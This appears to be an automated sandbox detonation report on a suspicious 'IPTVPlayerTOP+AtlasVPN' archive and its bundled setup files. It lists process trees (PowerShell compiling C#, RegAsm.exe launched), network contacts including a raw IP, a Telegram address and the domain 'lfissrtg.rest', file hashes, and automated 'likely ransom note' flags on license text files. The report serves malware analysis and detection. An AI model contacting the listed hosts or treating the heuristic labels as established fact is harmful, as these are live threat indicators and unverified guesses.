C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6F63.tmp" "c:\Users\Admin\AppData\Local\Temp\noth44de\CSCA73B8FE686AE4C7A89AF8BE2D278FC85.TMP"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0xf8,0x130,0x7ffbe14d46f8,0x7ffbe14d4708,0x7ffbe14d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14260339576579605829,4296676583812131019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
CH 147.45.44.131:80 147.45.44.131 tcp
US 8.8.8.8:53 131.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 lfissrtg.rest udp
DE 116.203.164.230:443 lfissrtg.rest tcp
DE 116.203.164.230:443 lfissrtg.rest tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
DE 116.203.164.230:443 lfissrtg.rest tcp
US 8.8.8.8:53 e5.o.lencr.org udp
DE 23.38.123.194:80 e5.o.lencr.org tcp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 230.164.203.116.in-addr.arpa udp
US 8.8.8.8:53 103.217.19.2.in-addr.arpa udp
US 8.8.8.8:53 194.123.38.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
FR 95.100.95.163:443 www.bing.com tcp
US 8.8.8.8:53 163.95.100.95.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
FR 95.100.95.163:443 th.bing.com tcp
FR 95.100.95.163:443 th.bing.com tcp
FR 95.100.95.163:443 th.bing.com tcp
FR 95.100.95.163:443 th.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.72:443 login.microsoftonline.com tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp

Files

memory/4460-0-0x00007FFBE16B3000-0x00007FFBE16B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fqbjb2sb.3bt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4460-10-0x0000018770E40000-0x0000018770E62000-memory.dmp

memory/4460-11-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

memory/4460-12-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

memory/4460-13-0x00000187589E0000-0x00000187589EE000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\noth44de\noth44de.cmdline

MD5 6e81d35ef615b53c3438650c935851ee
SHA1 2149db51db6acae576f29efafcc77cbc7a8f4c59
SHA256 60386dbe41a2f39e0fc77ef1b23d463a95f87b2fc57f51f1a9ce0bcb8c151390
SHA512 7ee45fec82aa03dcb0e53c364e6d00dbeacd6d823a5c684b0c2a549e50672309b26cd4e5b2e42b95dc3ed818bed3e28b177b71045a8d9a27c10d2f38cac34427

\??\c:\Users\Admin\AppData\Local\Temp\noth44de\noth44de.0.cs

MD5 478b152b3b9b40edaf5edcc91037dab8
SHA1 89b9a0358abdbc20f0093421d020ceebe6e5d515
SHA256 642d655cf208af1b6b913ef51c89134f794f185c4f661e5428b5e50dd5f36cbb
SHA512 9000302d0cafe0421143491e73846bad7bb03b1863c7515452fb2789d6b7124a87c8b0e11ef8c8020d663f5849d7f8055413c0e2e7dfe35bf180dde508aba12e

C:\Users\Admin\AppData\Local\Temp\RES6F63.tmp

MD5 b0d01e58088a9da540dde6f0e020213e
SHA1 661612aac66b4057ff9d830dfd2e8d6971a642b7
SHA256 4c5c011add5ed0e62a15be57689539e4ae66d30a62b91bfd46573a827c09dfb1
SHA512 648b9b0cd4f6b94d329e162b79ef27904cf2ad3fed401ec748854cea6f47a17b93dca62d8db76d047e477a8ee65bb3c629a2e60b6c5904b8a9975f056349d7d7

C:\Users\Admin\AppData\Local\Temp\noth44de\noth44de.dll

MD5 98014637d68d00443f347928ef88b1a8
SHA1 4fc1f64fd2afa689dc9b6646a129962c345829d0
SHA256 0a8ecb1587b63bdeaff491a8f7888d954c6c80ac22e65bc83933e61e3108a4f2
SHA512 d9aa8acee0ddc7767a25c06e02f496ee9d6714cbba349c5151b87fef874acecedd0a77f602692da17a8510fc53c3d140c1561eb26a8ad9aa68b5748c3d2c1152

memory/4460-26-0x0000018770E10000-0x0000018770E18000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\noth44de\CSCA73B8FE686AE4C7A89AF8BE2D278FC85.TMP

MD5 d89a1e4ddcd3bb5f854caf57c914bc09
SHA1 b20253c104eda8bc0e247e2750ec9b9a88e0ad7c
SHA256 5b582fdb80a83b1e7b08ed2d10a200daea107259b6cf56b2fc1e817fd9bf5ad4
SHA512 051f0ebe0ba7fdc53fe49b1c1b4a1290828c2a8ea6a415ef93a3eb19a9f42eada366b6b9544fb80afb8e22ec8679a8e4cb6013dc0025b55c4e35df472a091db8

memory/548-28-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4460-31-0x00007FFBE16B0000-0x00007FFBE2171000-memory.dmp

memory/548-32-0x0000000000400000-0x0000000000460000-memory.dmp

memory/548-33-0x0000000000400000-0x0000000000460000-memory.dmp

memory/548-35-0x0000000000400000-0x0000000000460000-memory.dmp

memory/548-42-0x0000000000400000-0x0000000000460000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

\??\pipe\LOCAL\crashpad_3340_XAZMPPGOBTMLTRVV

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9fe1498dd64a0b24ae74ffd66fe8d65f
SHA1 1eff1102e0b0835086ef009476f08fa499ee2321
SHA256 b9e31937ef4ce588fbfaa1f0f61897900921aa740f583a5c8887c100365aa98a
SHA512 b13b743a04087810d3303400bd7e3d1ecd82c4b644f7107fd3433200ec00a84375e181e474d740fc89676e93b299ab28eb35909d640412c9b638dd9199c6c173

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7a7a36929045246772c788afd06824be
SHA1 19bc54a624fe6f3fd732a14bd4857adf488d9495
SHA256 eb4174b1525ca884d911e1c50d781b0568445ab1af946e8c6b15201038437bfc
SHA512 d04ab257f969d3a5876a84a20dd24e3c46f24bc8ec4ae44f6d5ee0f3dab43ab260160ce309beeea9ee52432b959bde3a9527f95b22ab4840f0d3811db4d2071e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 efaf8d05ab8f11ac9e09589340ecf7ac
SHA1 75d9223faa113386c00ae7fc34c04e8d0d88c09d
SHA256 00944f4517e6444915b861fe51137d43ed26f5c5ab6000101d84d434eb396123
SHA512 17911b0f84fe36443fca24e652028b23f581f51c18786cfe1d9cb705d7844f82e8b05fc41467aa5c5ce0c8de153ab3fad3eb749ff74fcfcf2664d4641ff28fe2

Analysis: behavioral10

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

63s

Max time network

64s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\Redist_DACFramework.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\Redist_DACFramework.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 122.164.16.2.in-addr.arpa udp
US 8.8.8.8:53 34.133.123.92.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

97s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\License Terms\License_SQLNCLI_ENU.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\License Terms\License_SQLNCLI_ENU.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 5.114.82.104.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

63s

Max time network

66s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IPTVPlayerTOP+AtlasVPN.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IPTVPlayerTOP+AtlasVPN.rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 24.125.209.23.in-addr.arpa udp
US 8.8.8.8:53 5.114.82.104.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 122.164.16.2.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

36s

Max time network

37s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\Client SDK\ODBC\170\License Terms\License_msodbcsql_ENU.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\Client SDK\ODBC\170\License Terms\License_msodbcsql_ENU.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 5.114.82.104.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

16s

Max time network

16s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\en\License_DACFx.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\en\License_DACFx.txt

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

99s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\en\License_DACFx.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\en\License_DACFx.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 5.114.82.104.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A